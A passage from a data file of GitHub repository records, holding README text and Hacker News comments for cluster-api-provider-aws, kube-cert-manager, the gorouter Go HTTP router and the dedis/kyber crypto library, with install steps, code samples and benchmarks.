following versions of Cluster API\nand support all Kubernetes versions that is supported by its compatible Cluster API version:\n\n| | Cluster API v1alpha4 (v0.4) | Cluster API v1beta1 (v1.x) |\n| --------------------------- | :-------------------------: | :-------------------------: |\n| CAPA v1alpha4 `(v0.7)` | \u2713 | \u2613 |\n| CAPA v1beta1 `(v1.x)` | \u2613 | \u2713 |\n| CAPA v1beta2 `(v2.x, main)`| \u2613 | \u2713 |\n\n(See [Kubernetes support matrix][cluster-api-supported-v] of Cluster API versions).\n\n------\n\n## Kubernetes versions with published AMIs\n\nSee [amis] for the list of most recently published AMIs.\n\n------\n\n## clusterawsadm\n\n`clusterawsadm` CLI tool provides bootstrapping, AMI, EKS, and controller related helpers.\n\n`clusterawsadm` binaries are released with each release, can be found under [assets](https://github.com/kubernetes-sigs/cluster-api-provider-aws/releases/latest) section.\n\n`clusterawsadm` could also be installed via Homebrew on macOS and linux OS.\nInstall the latest release using homebrew:\n```shell\nbrew install clusterawsadm\n```\n\nTest to ensure the version you installed is up-to-date:\n```shell\nclusterawsadm version\n```\n\n------\n\n## Getting involved and contributing\n\nAre you interested in contributing to cluster-api-provider-aws? We, the\nmaintainers and community, would love your suggestions, contributions, and help!\nAlso, the maintainers can be contacted at any time to learn more about how to get\ninvolved.\n\nIn the interest of getting more new people involved we tag issues with\n[`good first issue`][good_first_issue].\nThese are typically issues that have smaller scope but are good ways to start\nto get acquainted with the codebase.\n\nWe also encourage ALL active community participants to act as if they are\nmaintainers, even if you don't have \"official\" write permissions. This is a\ncommunity effort, we are here to serve the Kubernetes community. If you have an\nactive interest and you want to get involved, you have real power! Don't assume\nthat the only people who can get things done around here are the \"maintainers\".\n\nWe also would love to add more \"official\" maintainers, so show us what you can\ndo!\n\nThis repository uses the Kubernetes bots. See a full list of the commands [here][prow].\n\n### Build the images locally\n\nIf you want to just build the CAPA containers locally, run\n\n```shell\n REGISTRY=docker.io/my-reg make docker-build\n```\n\n### Tilt-based development environment\n\nSee [development][development] section for details.\n\n### Implementer office hours\n\nMaintainers hold office hours every two weeks, with sessions open to all\ndevelopers working on this project.\n\nOffice hours are hosted on a zoom video chat every other Monday\nat 09:00 (Pacific) / 12:00 (Eastern) / 17:00 (Europe/London),\nand are published on the [Kubernetes community meetings calendar][gcal].\n\n### Other ways to communicate with the contributors\n\nPlease check in with us in the [#cluster-api-aws][slack] channel on Slack.\n\n## Github issues\n\n### Bugs\n\nIf you think you have found a bug please follow the instructions below.\n\n- Please spend a small amount of time giving due diligence to the issue tracker. Your issue might be a duplicate.\n- Get the logs from the cluster controllers. Please paste this into your issue.\n- Open a [new issue][new_issue].\n- Remember that users might be searching for your issue in the future, so please give it a meaningful title to help others.\n- Feel free to reach out to the cluster-api community on the [kubernetes slack][slack].\n\n### Tracking new features\n\nWe also use the issue tracker to track features. If you have an idea for a feature, or think you can help kops become even more awesome follow the steps below.\n\n- Open a [new issue][new_issue].\n- Remember that users might be searching for your issue in the future, so please\n give it a meaningful title to help others.\n- Clearly define the use case, using concrete examples. EG: I type `this` and\n cluster-api-provider-aws does `that`.\n- Some of our larger features will require some design. If you would like to\n include a technical design for your feature please include it in the issue.\n- After the new feature is well understood, and the design agreed upon, we can\n start coding the feature. We would love for you to code it. So please open\n up a **WIP** *(work in progress)* pull request, and happy coding.\n\n>\u201cAmazon Web Services, AWS, and the \u201cPowered by AWS\u201d logo materials are\ntrademarks of Amazon.com, Inc. or its affiliates in the United States\nand/or other countries.\"\n\n## Our Contributors\n\nThank you to all contributors and a special thanks to our current maintainers & reviewers:\n\n| Maintainers | Reviewers |\n|------------------------------------------------------------------| -------------------------------------------------------------------- |\n| [@richardcase](https://github.com/richardcase) (from 2020-12-04) | [@shivi28](https://github.com/shivi28) (from 2021-08-27) |\n| [@Skarlso](https://github.com/Skarlso) (from 2022-10-19) | [@dthorsen](https://github.com/dthorsen) (from 2020-12-04) |\n| [@Ankitasw](https://github.com/Ankitasw) (from 2022-10-19) | [@pydctw](https://github.com/pydctw) (from 2021-12-09) |\n| [@dlipovetsky](https://github.com/dlipovetsky) (from 2021-10-31) | [@AverageMarcus](https://github.com/AverageMarcus) (from 2022-10-19) |\n\nand the previous/emeritus maintainers & reviewers:\n\n| Emeritus Maintainers | Emeritus Reviewers |\n|------------------------------------------------------|--------------------------------------------------------|\n| [@chuckha](https://github.com/chuckha) | [@ashish-amarnath](https://github.com/ashish-amarnath) |\n| [@detiber](https://github.com/detiber) | [@davidewatson](https://github.com/davidewatson) |\n| [@ncdc](https://github.com/ncdc) | [@enxebre](https://github.com/enxebre) |\n| [@randomvariable](https://github.com/randomvariable) | [@ingvagabund](https://github.com/ingvagabund) |\n| [@rudoi](https://github.com/rudoi) | [@michaelbeaumont](https://github.com/michaelbeaumont) |\n| [@sedefsavas](https://github.com/sedefsavas) | [@sethp-nr](https://github.com/sethp-nr) |\n| [@vincepri](https://github.com/vincepri) | | \n\nAll the CAPA contributors:\n\n

\n\n \n\n

\n\n\n[slack]: https://kubernetes.slack.com/messages/CD6U2V71N\n[good_first_issue]: https://github.com/kubernetes-sigs/cluster-api-provider-aws/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc+label%3A%22good+first+issue%22\n[gcal]: https://calendar.google.com/calendar/embed?src=cgnt364vd8s86hr2phapfjc6uk%40group.calendar.google.com\n[prow]: https://go.k8s.io/bot-commands\n[new_issue]: https://github.com/kubernetes-sigs/cluster-api-provider-aws/issues/new\n[cluster_api]: https://github.com/kubernetes-sigs/cluster-api\n[kops]: https://github.com/kubernetes/kops\n[kubicorn]: http://kubicorn.io/\n[amis]: https://cluster-api-aws.sigs.k8s.io/topics/images/amis.html\n[published_amis]: https://cluster-api-aws.sigs.k8s.io/topics/images/built-amis.html\n[eks_support]: https://cluster-api-aws.sigs.k8s.io/topics/eks/index.html\n[cluster-api-supported-v]: https://cluster-api.sigs.k8s.io/reference/versions.html\n[development]: https://cluster-api-aws.sigs.k8s.io/development/development.html\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PalmStoneGames/kube-cert-manager", "link": "https://github.com/PalmStoneGames/kube-cert-manager", "tags": ["certificate", "kubernetes", "tls", "letsencrypt"], "stars": 533, "description": "Manage Lets Encrypt certificates for a Kubernetes cluster.", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes Certificate Manager\n\n## Deprecation notice: This project is deprecated in favor of [cert-manager](https://github.com/jetstack/cert-manager)\n\nThis project is loosely based on https://github.com/kelseyhightower/kube-cert-manager\nIt took over most of its documentation, license, as well as the general approach to how things work.\n\nThe code itself however, was entirely reimplemented to use xenolf/lego as the basis, instead of reimplementing an ACME client and DNS plugins.\n\n## Version\n\nPlease note: This is the documentation for the currently in development version of kcm, please refer to [v0.4.0](https://github.com/PalmStoneGames/kube-cert-manager/tree/v0.4.0) for documentation for the latest stable version\n\n## Special note for upgrading from earlier versions\n\nIf you are upgrading from a version before 0.5.0 then note that the default way to identify Ingress resources\nto be managed by the certificate manager has changed, from the `enabled` annotation, to the `class` label.\n[Backwards compatible behaviour is available](docs/ingress.md) by setting the `-class` [argument](docs/deployment-arguments.md) to a blank value.\n\n## Features\n\n* Manage Kubernetes TLS secrets backed by Let's Encrypt issued certificates.\n* Manage [Let's Encrypt](https://letsencrypt.org) issued certificates based on Kubernetes ThirdParty Resources.\n* Manage [Let's Encrypt](https://letsencrypt.org) issued certificates based on Kubernetes Ingress Resources.\n* Domain validation using ACME HTTP-01, SNI-TLS-01 or DNS-01 challenges.\n* Support for multiple challenge providers.\n* Support for subject alternative names in requested certificates.\n\n## Project Goals\n\n* Demonstrate how to build custom Kubernetes controllers.\n* Demonstrate how to use Kubernetes [Custom Resource Definitions](https://kubernetes.io/docs/concepts/api-extension/custom-resources/).\n* Demonstrate how to interact with the Kubernetes API (watches, reconciliation, etc).\n* Demonstrate how to write great documentation for Kubernetes add-ons and extensions.\n* Promote the usage of Let's Encrypt for securing web applications running on Kubernetes.\n\n## Requirements\n\n* Kubernetes 1.7+\n* At least one configured [challenge provider](docs/providers.md)\n\n## Usage\n\n* [Deployment Guide](docs/deployment-guide.md)\n* [Creating a Certificate](docs/create-a-certificate.md)\n* [Deleting a Certificate](docs/delete-a-certificate.md)\n* [Consuming Certificates](docs/consume-certificates.md)\n- [Managing Certificates for Ingress Resources](docs/ingress.md)\n- [Garbage Collection of Secrets](docs/garbage-collection.md)\n* [Secure Deployment using RBAC](docs/secure-deployment.md)\n\n## Documentation\n\n* [Deployment Arguments](docs/deployment-arguments.md)\n* [Certificate Custom Resource Definitions](docs/certificate-custom-resource.md)\n* [Certificate Resources](docs/certificate-resources.md)\n* [Challenge Providers](docs/providers.md)\n* [Building Container Image with AWS CodeBuild](codebuild/README.md)\n", "readme_type": "markdown", "hn_comments": "What are the major difference between this and say kube-lego that might entice someone to switch?I'm curious what advantages and tradeoffs it has over the project that it is based upon [1] for a person choosing between them.[1]: https://github.com/kelseyhightower/kube-cert-managerBig kudos to Luna for fusing both of these awesome projects - this was actually on our backlog too and helped a lot!I've been using this project on GKE for ~2 weeks now in combination with the nginx ingress controller. \nI have it configured to use the DNS challenge to get new certs so I don't have to expose an extra port as well.It feels liberating to just get an SSL cert for any subdomain I need and have the whole process abstracted from me.I thought I wanted this for a long time, but `kube-lego` gets me very similar results... without needing to inject credentials for my DNS provider to my cluster.I'm curious if others have thoughts on this vs kube-lego. (I would agree that I like the approach of this project quite a bit more than kelseyhightower's. This feels more complete, works with far more providers, etc)Found this similar project a couple days ago: https://github.com/tazjin/kubernetes-letsencryptDoesn't seem quite as configurable but looks a bit simpler to implement.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xujiajun/gorouter", "link": "https://github.com/xujiajun/gorouter", "tags": ["go", "router", "gorouter", "restful-api", "golang"], "stars": 533, "description": "xujiajun/gorouter is a simple and fast HTTP router for Go. It is easy to build RESTful APIs and your web framework.", "lang": "Go", "repo_lang": "", "readme": "# gorouter [![GoDoc](https://godoc.org/github.com/xujiajun/gorouter?status.svg)](https://godoc.org/github.com/xujiajun/gorouter) \"Build [![Go Report Card](https://goreportcard.com/badge/github.com/xujiajun/gorouter)](https://goreportcard.com/report/github.com/xujiajun/gorouter) [![Coverage Status](https://s3.amazonaws.com/assets.coveralls.io/badges/coveralls_100.svg)](https://coveralls.io/github/xujiajun/gorouter?branch=master) [![License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)](https://raw.githubusercontent.com/xujiajun/gorouter/master/LICENSE) [![Release](https://img.shields.io/badge/release-v1.1.0-blue.svg?style=flat-square)](https://github.com/xujiajun/gorouter/releases/tag/v1.0.1) [![Awesome](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go#routers) \n`xujiajun/gorouter` is a simple and fast HTTP router for Go. It is easy to build RESTful APIs and your web framework.\n\n## Motivation\n\nI wanted a simple and fast HTTP GO router, which supports regexp. I prefer to support regexp is because otherwise it will need the logic to check the URL parameter type, thus increasing the program complexity. So I did some searching on Github and found the wonderful `julienschmidt/httprouter`: it is very fast\uff0cunfortunately it does not support regexp. Later I found out about `gorilla/mux`: it is powerful as well\uff0cbut a written benchmark shows me that it is somewhat slow. So I tried to develop a new router which both supports regexp and should be fast. Finally I did it and named `xujiajun/gorouter`. By the way, this is my first GO open source project. It may be the fastest GO HTTP router which supports regexp, and regarding its performance please refer to my latest [Benchmarks](#benchmarks).\n\n## Features\n\n* Fast - see [Benchmarks](#benchmarks)\n* [URL parameters](#url-parameters)\n* [Regex parameters](#regex-parameters)\n* [Routes groups](#routes-groups)\n* [Reverse Routing](#reverse-routing)\n* [Custom NotFoundHandler](#custom-notfoundhandler)\n* [Custom PanicHandler](#custom-panichandler)\n* [Middleware Chain Support](#middlewares-chain)\n* [Serve Static Files](#serve-static-files)\n* [Pattern Rule Familiar](#pattern-rule)\n* HTTP Method Get\u3001Post\u3001Delete\u3001Put\u3001Patch Support\n* No external dependencies (just Go stdlib)\n\n\n## Requirements\n\n* golang 1.8+\n\n## Installation\n\n```\ngo get -u github.com/xujiajun/gorouter\n```\n\n## Usage\n\n### Static routes\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n\n```\n\n### URL Parameters\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\t//url parameters match\n\tmux.GET(\"/user/:id\", func(w http.ResponseWriter, r *http.Request) {\n\t\t//get one URL parameter\n\t\tid := gorouter.GetParam(r, \"id\")\n\t\t//get all URL parameters\n\t\t//id := gorouter.GetAllParams(r)\n\t\t//fmt.Println(id)\n\t\tw.Write([]byte(\"match user/:id ! get id:\" + id))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Regex Parameters\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\t//url regex match\n\tmux.GET(\"/user/{id:[0-9]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"match user/{id:[0-9]+} !\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n\n### Routes Groups\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc usersHandler(w http.ResponseWriter, r *http.Request) {\n\tfmt.Fprint(w, \"/api/users\")\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.Group(\"/api\").GET(\"/users\", usersHandler)\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Reverse Routing\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\n\trouteName1 := \"user_event\"\n\tmux.GETAndName(\"/users/:user/events\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"/users/:user/events\"))\n\t}, routeName1)\n\n\trouteName2 := \"repos_owner\"\n\tmux.GETAndName(\"/repos/{owner:\\\\w+}/{repo:\\\\w+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"/repos/{owner:\\\\w+}/{repo:\\\\w+}\"))\n\t}, routeName2)\n\n\tparams := make(map[string]string)\n\tparams[\"user\"] = \"xujiajun\"\n\tfmt.Println(mux.Generate(http.MethodGet, routeName1, params)) // /users/xujiajun/events \n\n\tparams = make(map[string]string)\n\tparams[\"owner\"] = \"xujiajun\"\n\tparams[\"repo\"] = \"xujiajun_repo\"\n\tfmt.Println(mux.Generate(http.MethodGet, routeName2, params)) // /repos/xujiajun/xujiajun_repo \n}\n\n```\n\n### Custom NotFoundHandler\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc notFoundFunc(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(http.StatusNotFound)\n\tfmt.Fprint(w, \"404 page !!!\")\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.NotFoundFunc(notFoundFunc)\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n### Custom PanicHandler\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.PanicHandler = func(w http.ResponseWriter, req *http.Request, err interface{}) {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tfmt.Println(\"err from recover is :\", err)\n\t\tfmt.Fprint(w, \"received a panic\")\n\t}\n\tmux.GET(\"/panic\", func(w http.ResponseWriter, r *http.Request) {\n\t\tpanic(\"panic\")\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n\n```\n\n### Middlewares Chain\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/xujiajun/gorouter\"\n)\n\ntype statusRecorder struct {\n\thttp.ResponseWriter\n\tstatus int\n}\n\nfunc (rec *statusRecorder) WriteHeader(code int) {\n\trec.status = code\n\trec.ResponseWriter.WriteHeader(code)\n}\n\n//https://upgear.io/blog/golang-tip-wrapping-http-response-writer-for-middleware/\nfunc withStatusRecord(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\trec := statusRecorder{w, http.StatusOK}\n\t\tnext.ServeHTTP(&rec, r)\n\t\tlog.Printf(\"response status: %v\\n\", rec.status)\n\t}\n}\n\nfunc notFoundFunc(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(http.StatusNotFound)\n\tfmt.Fprint(w, \"Not found page !\")\n}\n\nfunc withLogging(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tlog.Printf(\"Logged connection from %s\", r.RemoteAddr)\n\t\tnext.ServeHTTP(w, r)\n\t}\n}\n\nfunc withTracing(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tlog.Printf(\"Tracing request for %s\", r.RequestURI)\n\t\tnext.ServeHTTP(w, r)\n\t}\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.NotFoundFunc(notFoundFunc)\n\tmux.Use(withLogging, withTracing, withStatusRecord)\n\tmux.GET(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hello world\"))\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\n\n## Serve static files\n\n```golang\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\t\"os\"\n\t\n\t\"github.com/xujiajun/gorouter\"\n)\n\n//ServeFiles serve static resources\nfunc ServeFiles(w http.ResponseWriter, r *http.Request) {\n\twd, err := os.Getwd()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdir := wd + \"/examples/serveStaticFiles/files\"\n\thttp.StripPrefix(\"/files/\", http.FileServer(http.Dir(dir))).ServeHTTP(w, r)\n}\n\nfunc main() {\n\tmux := gorouter.New()\n\tmux.GET(\"/hi\", func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Write([]byte(\"hi\"))\n\t})\n\t//defined prefix\n\tmux2 := mux.Group(\"/files\")\n\t//http://127.0.0.1:8181/files/demo.txt\n\t//will match\n\tmux2.GET(\"/{filename:[0-9a-zA-Z_.]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tServeFiles(w, r)\n\t})\n\n\t//http://127.0.0.1:8181/files/a/demo2.txt\n\t//http://127.0.0.1:8181/files/a/demo.txt\n\t//will match\n\tmux2.GET(\"/{fileDir:[0-9a-zA-Z_.]+}/{filename:[0-9a-zA-Z_.]+}\", func(w http.ResponseWriter, r *http.Request) {\n\t\tServeFiles(w, r)\n\t})\n\n\tlog.Fatal(http.ListenAndServe(\":8181\", mux))\n}\n```\nDetail see [serveStaticFiles example](https://github.com/xujiajun/gorouter/blob/master/examples/serveStaticFiles/main.go)\n\n## Pattern Rule\n\nThe syntax here is modeled after [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter) and [gorilla/mux](https://github.com/gorilla/mux)\n\n| Syntax | Description | Example |\n|--------|------|-------|\n| `:name` | named parameter | /user/:name |\n| `{name:regexp}` | named with regexp parameter | /user/{name:[0-9a-zA-Z]+} |\n| `:id` | named with regexp parameter | /user/:id |\n\nAnd `:id` is short for `{id:[0-9]+}`, `:name` are short for `{name:[0-9a-zA-Z_]+}`\n\n> if use default regex checks unless you know what you're doing\n\n \n## Benchmarks\n\nthe benchmarks code for gorouter be found in the [gorouter-bench](https://github.com/xujiajun/gorouter-bench) repository.\n\n> go test -bench=.\n\n### Benchmark System:\n\n* Go Version : go1.11.2 darwin/amd64\n* OS: Mac OS X 10.13.6\n* Architecture: x86_64\n* 16 GB 2133 MHz LPDDR3\n* CPU: 3.1 GHz Intel Core i7\n\n### Tested routers:\n\n* [beego/mux](https://github.com/beego/mux)\n* [go-zoo/bone](https://github.com/go-zoo/bone)\n* [go-chi/chi](https://github.com/go-chi/chi)\n* [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter)\n* [gorilla/mux](https://github.com/gorilla/mux)\n* [trie-mux/mux](https://github.com/teambition/trie-mux)\n* [xujiajun/gorouter](https://github.com/xujiajun/gorouter)\n\n\nThanks the author of httprouter: [@julienschmidt](https://github.com/julienschmidt) give me advise about benchmark [issues/24](https://github.com/xujiajun/gorouter/issues/24)\n\n## Result:\n\nGiven some routing matching syntax differences, divide GithubAPI into two groups\uff1a\n\n### Using GithubAPI Result\uff1a\n\n```\nBenchmarkBeegoMuxRouterWithGithubAPI-8 \t 10000\t 142398 ns/op\t 134752 B/op\t 1038 allocs/op\nBenchmarkBoneRouterWithGithubAPI-8 \t 1000\t 2104486 ns/op\t 720160 B/op\t 8620 allocs/op\nBenchmarkTrieMuxRouterWithGithubAPI-8 \t 20000\t 80845 ns/op\t 65856 B/op\t 537 allocs/op\nBenchmarkHttpRouterWithGithubAPI-8 \t 50000\t 30169 ns/op\t 13792 B/op\t 167 allocs/op\nBenchmarkGoRouter1WithGithubAPI-8 \t 30000\t 57793 ns/op\t 13832 B/op\t 406 allocs/op\n\n```\n### Using GithubAPI2 Result\uff1a\n\n```\nBenchmarkGoRouter2WithGithubAPI2-8 \t 30000\t 57613 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkChiRouterWithGithubAPI2-8 \t 10000\t 143224 ns/op\t 104436 B/op\t 1110 allocs/op\nBenchmarkMuxRouterWithGithubAPI2-8 \t 300\t 4450731 ns/op\t 61463 B/op\t 995 allocs/op\n```\n\n### All togther Result\uff1a\n\n```\n\u279c gorouter git:(master) go test -bench=.\nGithubAPI Routes: 203\nGithubAPI2 Routes: 203\n BeegoMuxRouter: 111072 Bytes\n BoneRouter: 100992 Bytes\n ChiRouter: 71512 Bytes\n HttpRouter: 37016 Bytes\n trie-mux: 131128 Bytes\n MuxRouter: 1378496 Bytes\n GoRouter1: 83824 Bytes\n GoRouter2: 85584 Bytes\ngoos: darwin\ngoarch: amd64\npkg: github.com/xujiajun/gorouter\nBenchmarkBeegoMuxRouterWithGithubAPI-8 \t 10000\t 142398 ns/op\t 134752 B/op\t 1038 allocs/op\nBenchmarkBoneRouterWithGithubAPI-8 \t 1000\t 2104486 ns/op\t 720160 B/op\t 8620 allocs/op\nBenchmarkTrieMuxRouterWithGithubAPI-8 \t 20000\t 80845 ns/op\t 65856 B/op\t 537 allocs/op\nBenchmarkHttpRouterWithGithubAPI-8 \t 50000\t 30169 ns/op\t 13792 B/op\t 167 allocs/op\nBenchmarkGoRouter1WithGithubAPI-8 \t 30000\t 57793 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkGoRouter2WithGithubAPI2-8 \t 30000\t 57613 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkChiRouterWithGithubAPI2-8 \t 10000\t 143224 ns/op\t 104436 B/op\t 1110 allocs/op\nBenchmarkMuxRouterWithGithubAPI2-8 \t 300\t 4450731 ns/op\t 61463 B/op\t 995 allocs/op\nPASS\nok \tgithub.com/xujiajun/gorouter\t15.918s\n\n```\n\n### Conclusions:\n\n* Performance (xujiajun/gorouter,julienschmidt/httprouter and teambition/trie-mux are fast)\n\n* Memory Consumption (xujiajun/gorouter and julienschmidt/httprouter are fewer) \n\n* Features (julienschmidt/httprouter not supports regexp\uff0cbut others support it)\n\n> if you want a high performance router which supports regexp, maybe [xujiajun/gorouter](https://github.com/xujiajun/gorouter) is good choice.\n\n> if you want a high performance router which not supports regexp, maybe [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter) is good choice.\n\nIn the end, as julienschmidt said `performance can not be the (only) criterion for choosing a router. Play around a bit with some of the routers, and choose the one you like best.`\n\n## Contributing\n\nIf you'd like to help out with the project. You can put up a Pull Request. Thanks to all [contributors](https://github.com/xujiajun/gorouter/graphs/contributors).\n\n## Author\n\n* [xujiajun](https://github.com/xujiajun)\n\n## License\n\nThe gorouter is open-sourced software licensed under the [MIT Licensed](http://www.opensource.org/licenses/MIT)\n\n## Acknowledgements\n\nThis package is inspired by the following:\n\n* [httprouter](https://github.com/julienschmidt/httprouter)\n* [bone](https://github.com/go-zoo/bone)\n* [trie-mux](https://github.com/teambition/trie-mux)\n* [alien](https://github.com/gernest/alien)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dedis/kyber", "link": "https://github.com/dedis/kyber", "tags": ["crypto-library", "elliptic-curves", "go"], "stars": 533, "description": "Advanced crypto library for the Go language", "lang": "Go", "repo_lang": "", "readme": "[![Go test](https://github.com/dedis/kyber/actions/workflows/go_tests.yml/badge.svg)](https://github.com/dedis/kyber/actions/workflows/go_tests.yml)\n[![Coverage Status](https://coveralls.io/repos/github/dedis/kyber/badge.svg?branch=master)](https://coveralls.io/github/dedis/kyber?branch=master)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=dedis_kyber&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=dedis_kyber)\n[![Go Reference](https://pkg.go.dev/badge/github.com/dedis/kyber.svg)](https://pkg.go.dev/github.com/dedis/kyber)\n\nDEDIS Advanced Crypto Library for Go\n====================================\n\nThis package provides a toolbox of advanced cryptographic primitives for Go,\ntargeting applications like [Cothority](https://go.dedis.ch/cothority)\nthat need more than straightforward signing and encryption.\nPlease see the\n[Godoc documentation for this package](https://godoc.org/go.dedis.ch/kyber)\nfor details on the library's purpose and API functionality.\n\nThis package includes a mix of variable time and constant time\nimplementations. If your application is sensitive to timing-based attacks\nand you need to constrain Kyber to offering only constant time implementations,\nyou should use the [suites.RequireConstantTime()](https://godoc.org/go.dedis.ch/kyber/suites#RequireConstantTime)\nfunction in the `init()` function of your `main` package.\n\nVersioning - Development\n------------------------\n\nWe use the following versioning model:\n\n* crypto.v0 was the first semi-stable version. See [migration notes](https://github.com/dedis/kyber/wiki/Migration-from-gopkg.in-dedis-crypto.v0).\n* kyber.v1 never existed, in order to keep kyber, onet and cothorithy versions linked\n* gopkg.in/dedis/kyber.v2 was the last stable version\n* Starting with v3.0.0, kyber is a Go module, and we respect [semantic versioning](https://golang.org/cmd/go/#hdr-Module_compatibility_and_semantic_versioning).\n\nSo if you depend on the master branch, you can expect breakages from time\nto time. If you need something that doesn't change in a backward-compatible\nway you should use have a `go.mod` file in the directory where your\nmain package is.\n\nUsing the module\n----------------\n\nKyber supports Go modules, and currently has a major version of 3, which means that\nthe import path is: `go.dedis.ch/kyber/v3`.\n\nHere is a basic example of getting started using it:\n1. Make a new directory called \u201cex\". Change directory to \u201cex\" and put this in main.go:\n```go\npackage main\n\nimport (\n \"fmt\"\n \"go.dedis.ch/kyber/v3/suites\"\n)\n\nfunc main() {\n s := suites.MustFind(\"Ed25519\")\n x := s.Scalar().Zero()\n fmt.Println(x)\n}\n```\n2. Type \u201cgo mod init example.com/ex\u201d. The resulting go.mod file will have no dependencies listed yet.\n3. Type \u201cgo build\u201d. The go tool will fill in the new dependencies that it find for you, i.e. \"require go.dedis.ch/kyber/v3 v3.0.13\u201d.\n4. Running `./ex` will print `0000000000000000000000000000000000000000000000000000000000000000`.\n\nA note on deriving shared secrets\n---------------------------------\n\nTraditionally, ECDH (Elliptic curve Diffie-Hellman) derives the shared secret\nfrom the x point only. In this framework, you can either manually retrieve the\nvalue or use the MarshalBinary method to take the combined (x, y) value as the\nshared secret. We recommend the latter process for new softare/protocols using\nthis framework as it is cleaner and generalizes across different types of groups\n(e.g., both integer and elliptic curves), although it will likely be\nincompatible with other implementations of ECDH. See [the Wikipedia\npage](http://en.wikipedia.org/wiki/Elliptic_curve_Diffie%E2%80%93Hellman) on\nECDH.\n\nReporting security problems\n---------------------------\n\nThis library is offered as-is, and without a guarantee. It will need an\nindependent security review before it should be considered ready for use in\nsecurity-critical applications. If you integrate Kyber into your application it\nis YOUR RESPONSIBILITY to arrange for that audit.\n\nIf you notice a possible security problem, please report it\nto dedis-security@epfl.ch.\n", "readme_type": "markdown", "hn_comments": "HashiCorp Vault?I also miss CodeFlow. At Amazon now and their review tool sucks.This is cool! I'm happy to see more options in this space.The best code review tool I've ever used was a tool at Google called Critique.[0] They've open-sourced it as Gerrit[1], but there are sadly no hosted versions available for under $15k/yr, and it's complicated to self-host.I've been using Reviewable, and my experience has been good not great. Github's native code review has caught up a bit, but Github's review tool falls apart if your review lasts more than one round.Here are my gripes with Reviewable:Steep learning curve - Every new developer who joins the team spends their first few reviews being confused and frustrated by Reviewable.Performance - Reviewable has awful performance. It takes about 10 seconds to load a code review. It seems like it's doing some odd websockets stuff where sometimes my \"connection\" to Reviewable will drop and I can't add comments. I've never experienced this with any other web app. It's gotten better over the last few years, but it's still annoyingly frequent.Complicated configuration - I just want the reviewer to be able to hit an \"LGTM\" button to mark their approval. Reviewable's decision about when a PR is approved is based 